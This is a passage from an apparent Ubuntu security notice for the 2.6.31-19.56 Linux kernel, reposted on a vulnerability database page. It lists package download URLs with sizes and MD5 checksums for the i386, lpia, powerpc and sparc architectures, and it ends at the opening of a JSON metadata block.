http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb
  Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb
  Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   148522 b96767af921427e880579659ba7b757a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   198810 76156647956f29c9e519aeac038c63bb
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    42148 931518b24b123d3749719c35b2b23759
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb
  Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   172836 8b15eb5579853f45dc49055351df4225
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    28366 0301ac544cf27b3dce660787d7575804
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   141998 930123e6b57798468d7085ae9f549150
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    46410 80945eba79f53965effd546d23a8560b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    44068 98817942a8188bd9281def20a1d327bb
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39270 47f890e2a1418595d92858350aa16475
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   149292 930001a305b0f78060f3472fe46cde00
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   784762 523b94315bff20137df79c5308abd5b7
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 24820746 adc5365726ba88565ad89953707bd012
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb
  Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210242 78939115c860efacb83481c0687f1a7a
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   131610 dc5625deacbac446e71517f5902376b1
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     5852 f049a9332d469b247e451868b4f22cce
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    27228 0b5b4529d140289e616bded832055cbc
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     8538 9010c080bd63660bf529930565d49f62
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58830 ae6573a0664b5486360156dd6711776c
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   139430 14f825a3334b18614059312527002767
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    70106 6dde178febff58a546142209374e1616
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5:   601506 1b56c59b3df953a640760b876d752465
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5:   600680 166e5056f971d5fa031230c1af67d028
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb
  Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   121954 75090ea655204cc898db4634fc8aa021
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   120960 8f63ad112de0797974650631dee53d13
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   184674 d704744a26941df63b9195288306fa7b

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
